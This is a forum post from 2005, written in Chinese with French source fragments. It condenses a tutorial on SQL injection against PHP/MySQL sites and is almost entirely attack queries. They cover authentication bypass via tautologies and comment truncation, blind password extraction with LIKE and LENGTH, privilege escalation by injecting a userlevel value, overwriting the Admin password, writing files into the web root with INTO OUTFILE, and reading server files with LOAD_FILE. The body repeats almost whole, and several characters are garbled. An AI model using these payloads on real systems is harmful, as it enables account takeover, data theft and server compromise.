Tony
2005-01-13, 11:51 PM
PHP注入.精简版本.小夜整理.有些地方我加了注释.
文章比较细致.主要介绍了三种SQL句子的注入方法.
1- SELECT
2- INSERT
3- UPDATE
$req = "SELECT * FROM membres WHERE name LIKE '%$search%' ORDER BY name"
où $search est la variable modifiable par l'utilisateur, venant d'un formulaire post (ou autre chose) de ce type :
<form method="POST" action="<? echo $PHP_SELF; ?>">
<input type="text" name="search"><br>
<input type="submit" value="Search">
</form>
SELECT * FROM membres WHERE name LIKE '%%' ORDER BY uid#%' ORDER BY name
$req = "SELECT uid FROM admins WHERE login='$login' AND password='$pass'"
SELECT * FROM table WHERE 1=1
SELECT * FROM table WHERE 'uuu'='uuu'
SELECT * FROM table WHERE 1<>2
SELECT * FROM table WHERE 3>2
SELECT * FROM table WHERE 2<3
SELECT * FROM table WHERE 1
SELECT * FROM table WHERE 1+1
SELECT * FROM table WHERE 1--1
SELECT * FROM table WHERE ISNULL(NULL)
SELECT * FROM table WHERE ISNULL(COT(0))
SELECT * FROM table WHERE 1 IS NOT NULL
SELECT * FROM table WHERE NULL IS NULL
SELECT * FROM table WHERE 2 BETWEEN 1 AND 3
SELECT * FROM table WHERE 'b' BETWEEN 'a' AND 'c'
SELECT * FROM table WHERE 2 IN (0,1,2)
SELECT * FROM table WHERE CASE WHEN 1>0 THEN 1 END -------小猪早就开始利用了.呵呵.
SELECT uid FROM admins WHERE login='' OR 'a'='a' AND password='' OR 'a'='a'
SELECT uid FROM admins WHERE login='John' AND password='' OR 'b' BETWEEN 'a' AND 'c'
SELECT * FROM table WHERE nom='Jack'# commentaire
SELECT * FROM table WHERE nom='Jack'
SELECT * FROM table WHERE /* commentaires */ addresse=ཕ rue des roubys'
SELECT * FROM table WHERE addresse=ཕ rue des roubys'
SELECT uid FROM admins WHERE login='John'#' AND password=''
SELECT uid FROM admins WHERE login='' OR admin_level=1#' AND password=''
$req = "SELECT password FROM admins WHERE login='$login'"
SELECT * FROM table INTO OUTFILE '/complete/path/to/file.txt' ----将表导出.
SELECT password FROM admins WHERE login='John' INTO DUMPFILE '/path/to/site/file.txt'
http://[target]/file.txt.
frog' INTO OUTFILE '/path/to/site/file.php .
$req = "SELECT uid FROM membres WHERE login='$login' AND password='$pass'"
SELECT * FROM table WHERE msg LIKE '%hop'
SELECT * FROM table WHERE msg LIKE 'hop%'
SELECT * FROM table WHERE msg LIKE '%hop%'
SELECT * FROM table WHERE msg LIKE 'h%p'
SELECT * FROM table WHERE msg LIKE 'h_p'
SELECT uid FROM membres WHERE login='Bob' AND password LIKE 'a%'#' AND password=''
SELECT uid FROM membres WHERE login='Bob' AND LENGTH(password)=6#' AND password=''
$req = "SELECT email, website FROM membres WHERE name LIKE '%$search%' ORDER BY name"
SELECT * FROM membres WHERE name LIKE '%%' ORDER BY uid#%' ORDER BY name
$req = "SELECT email, website FROM membres WHERE name LIKE '%$search%' ORDER BY $orderby"
以上是SELECT的注入.上面提到的.我们早已经掌握了.继续看
INSERT :
CREATE TABLE membres (
id int(10) NOT NULL auto_increment,
login varchar(25),
password varchar(25),
nom varchar(30),
email varchar(30),
userlevel tinyint,
PRIMARY KEY (id)
)
$query1 = "INSERT INTO membres (login,password,nom,email,userlevel) VALUES ('$login','$pass','$nom','$email',Ƈ')"
INSERT INTO membres (login,password,nom,email,userlevel) VALUES ('','','','',Ɖ')#',Ƈ')
CREATE TABLE membres (
id int(10) NOT NULL auto_increment,
login varchar(25),
password varchar(25),
nom varchar(30),
email varchar(30),
userlevel tinyint default Ƈ',
PRIMARY KEY (id)
)
$query2 = "INSERT INTO membres SET login='$login',password='$pass',nom='$nom',email='$email'"
INSERT INTO membres SET login='',password='',nom='',userlevel=Ɖ',email=''
CREATE TABLE membres (
id varchar(15) NOT NULL default '',
login varchar(25),
password varchar(25),
nom varchar(30),
email varchar(30),
userlevel tinyint,
PRIMARY KEY (id)
)
$query3 = "INSERT INTO membres VALUES ('$id','$login','$pass','$nom','$email',Ƈ')"
INSERT INTO membres VALUES ('[ID]','[LOGIN]','[PASS]','[NOM]','a@a.a',Ɖ')#',Ƈ')
可见.INSERT注入关键是截断,)再加注释的利用.没问题.很简单吧.继续
UPDATE的利用
CREATE TABLE membres (
id int(10) NOT NULL auto_increment,
login varchar(25),
password varchar(25),
nom varchar(30),
email varchar(30),
userlevel tinyint,
PRIMARY KEY (id)
)
$sql = "UPDATE membres SET password='$pass',nom='$nom',email='$email' WHERE id='$id'"
UPDATE membres SET password='[PASS]',nom='',userlevel=Ɖ',email=' ' WHERE id='[ID]'
UPDATE membres SET password='[nouveaupass]' WHERE nom='Admin'#',nom='[NOM]',email=' ' WHERE id='[ID]'
UPDATE membres SET password='[nouveaupass]' WHERE nom='Admin'
UPDATE membres SET password='[PASS]',nom='[NOM]',email=' ' WHERE id='' OR name='Admin'
CREATE TABLE news (
idnews int(10) NOT NULL auto_increment,
title varchar(50),
author varchar(20),
news text,
Votes int(5),
score int(15),
PRIMARY KEY (idnews)
)
$sql = "UPDATE news SET Votes=Votes+1, score=score+$note WHERE idnews='$id'"
UPDATE news SET Votes=Votes+1, score=score+3, title='hop' WHERE idnews='
UPDATE news SET Votes=Votes+1, score=score+3,Votes=0 WHERE idnews='
UPDATE news SET Votes=Votes+1, score=score+3, title=char(104,111,112) WHERE idnews='
la fonction ASCII() ou ORD(). ASCII('h') et ORD('h')
UPDATE news SET Votes=Votes+1, score=score+3, title=0x616263 WHERE idnews='
SELECT CONV("abc",16,3), CONV("abc",16,8).
DATABASE() et USER() ( ou SYSTEM_USER() ou CURRENT_USER() ou SESSION_USER() )
UPDATE news SET Votes=Votes+1, score=score+3, title=DATABASE() WHERE idnews='
UPDATE news SET Votes=Votes+1, score=score+3, news=LOAD_FILE('/tmp/picture') WHERE idnews='
文章比较细致.主要介绍了三种SQL句子的注入方法.
1- SELECT
2- INSERT
3- UPDATE
$req = "SELECT * FROM membres WHERE name LIKE '%$search%' ORDER BY name"
où $search est la variable modifiable par l'utilisateur, venant d'un formulaire post (ou autre chose) de ce type :
<form method="POST" action="<? echo $PHP_SELF; ?>">
<input type="text" name="search"><br>
<input type="submit" value="Search">
</form>
SELECT * FROM membres WHERE name LIKE '%%' ORDER BY uid#%' ORDER BY name
$req = "SELECT uid FROM admins WHERE login='$login' AND password='$pass'"
SELECT * FROM table WHERE 1=1
SELECT * FROM table WHERE 'uuu'='uuu'
SELECT * FROM table WHERE 1<>2
SELECT * FROM table WHERE 3>2
SELECT * FROM table WHERE 2<3
SELECT * FROM table WHERE 1
SELECT * FROM table WHERE 1+1
SELECT * FROM table WHERE 1--1
SELECT * FROM table WHERE ISNULL(NULL)
SELECT * FROM table WHERE ISNULL(COT(0))
SELECT * FROM table WHERE 1 IS NOT NULL
SELECT * FROM table WHERE NULL IS NULL
SELECT * FROM table WHERE 2 BETWEEN 1 AND 3
SELECT * FROM table WHERE 'b' BETWEEN 'a' AND 'c'
SELECT * FROM table WHERE 2 IN (0,1,2)
SELECT * FROM table WHERE CASE WHEN 1>0 THEN 1 END -------小猪早就开始利用了.呵呵.
SELECT uid FROM admins WHERE login='' OR 'a'='a' AND password='' OR 'a'='a'
SELECT uid FROM admins WHERE login='John' AND password='' OR 'b' BETWEEN 'a' AND 'c'
SELECT * FROM table WHERE nom='Jack'# commentaire
SELECT * FROM table WHERE nom='Jack'
SELECT * FROM table WHERE /* commentaires */ addresse=ཕ rue des roubys'
SELECT * FROM table WHERE addresse=ཕ rue des roubys'
SELECT uid FROM admins WHERE login='John'#' AND password=''
SELECT uid FROM admins WHERE login='' OR admin_level=1#' AND password=''
$req = "SELECT password FROM admins WHERE login='$login'"
SELECT * FROM table INTO OUTFILE '/complete/path/to/file.txt' ----将表导出.
SELECT password FROM admins WHERE login='John' INTO DUMPFILE '/path/to/site/file.txt'
http://[target]/file.txt.
frog' INTO OUTFILE '/path/to/site/file.php .
$req = "SELECT uid FROM membres WHERE login='$login' AND password='$pass'"
SELECT * FROM table WHERE msg LIKE '%hop'
SELECT * FROM table WHERE msg LIKE 'hop%'
SELECT * FROM table WHERE msg LIKE '%hop%'
SELECT * FROM table WHERE msg LIKE 'h%p'
SELECT * FROM table WHERE msg LIKE 'h_p'
SELECT uid FROM membres WHERE login='Bob' AND password LIKE 'a%'#' AND password=''
SELECT uid FROM membres WHERE login='Bob' AND LENGTH(password)=6#' AND password=''
$req = "SELECT email, website FROM membres WHERE name LIKE '%$search%' ORDER BY name"
SELECT * FROM membres WHERE name LIKE '%%' ORDER BY uid#%' ORDER BY name
$req = "SELECT email, website FROM membres WHERE name LIKE '%$search%' ORDER BY $orderby"
以上是SELECT的注入.上面提到的.我们早已经掌握了.继续看
INSERT :
CREATE TABLE membres (
id int(10) NOT NULL auto_increment,
login varchar(25),
password varchar(25),
nom varchar(30),
email varchar(30),
userlevel tinyint,
PRIMARY KEY (id)
)
$query1 = "INSERT INTO membres (login,password,nom,email,userlevel) VALUES ('$login','$pass','$nom','$email',Ƈ')"
INSERT INTO membres (login,password,nom,email,userlevel) VALUES ('','','','',Ɖ')#',Ƈ')
CREATE TABLE membres (
id int(10) NOT NULL auto_increment,
login varchar(25),
password varchar(25),
nom varchar(30),
email varchar(30),
userlevel tinyint default Ƈ',
PRIMARY KEY (id)
)
$query2 = "INSERT INTO membres SET login='$login',password='$pass',nom='$nom',email='$email'"
INSERT INTO membres SET login='',password='',nom='',userlevel=Ɖ',email=''
CREATE TABLE membres (
id varchar(15) NOT NULL default '',
login varchar(25),
password varchar(25),
nom varchar(30),
email varchar(30),
userlevel tinyint,
PRIMARY KEY (id)
)
$query3 = "INSERT INTO membres VALUES ('$id','$login','$pass','$nom','$email',Ƈ')"
INSERT INTO membres VALUES ('[ID]','[LOGIN]','[PASS]','[NOM]','a@a.a',Ɖ')#',Ƈ')
可见.INSERT注入关键是截断,)再加注释的利用.没问题.很简单吧.继续
UPDATE的利用
CREATE TABLE membres (
id int(10) NOT NULL auto_increment,
login varchar(25),
password varchar(25),
nom varchar(30),
email varchar(30),
userlevel tinyint,
PRIMARY KEY (id)
)
$sql = "UPDATE membres SET password='$pass',nom='$nom',email='$email' WHERE id='$id'"
UPDATE membres SET password='[PASS]',nom='',userlevel=Ɖ',email=' ' WHERE id='[ID]'
UPDATE membres SET password='[nouveaupass]' WHERE nom='Admin'#',nom='[NOM]',email=' ' WHERE id='[ID]'
UPDATE membres SET password='[nouveaupass]' WHERE nom='Admin'
UPDATE membres SET password='[PASS]',nom='[NOM]',email=' ' WHERE id='' OR name='Admin'
CREATE TABLE news (
idnews int(10) NOT NULL auto_increment,
title varchar(50),
author varchar(20),
news text,
Votes int(5),
score int(15),
PRIMARY KEY (idnews)
)
$sql = "UPDATE news SET Votes=Votes+1, score=score+$note WHERE idnews='$id'"
UPDATE news SET Votes=Votes+1, score=score+3, title='hop' WHERE idnews='
UPDATE news SET Votes=Votes+1, score=score+3,Votes=0 WHERE idnews='
UPDATE news SET Votes=Votes+1, score=score+3, title=char(104,111,112) WHERE idnews='
la fonction ASCII() ou ORD(). ASCII('h') et ORD('h')
UPDATE news SET Votes=Votes+1, score=score+3, title=0x616263 WHERE idnews='
SELECT CONV("abc",16,3), CONV("abc",16,8).
DATABASE() et USER() ( ou SYSTEM_USER() ou CURRENT_USER() ou SESSION_USER() )
UPDATE news SET Votes=Votes+1, score=score+3, title=DATABASE() WHERE idnews='
UPDATE news SET Votes=Votes+1, score=score+3, news=LOAD_FILE('/tmp/picture') WHERE idnews='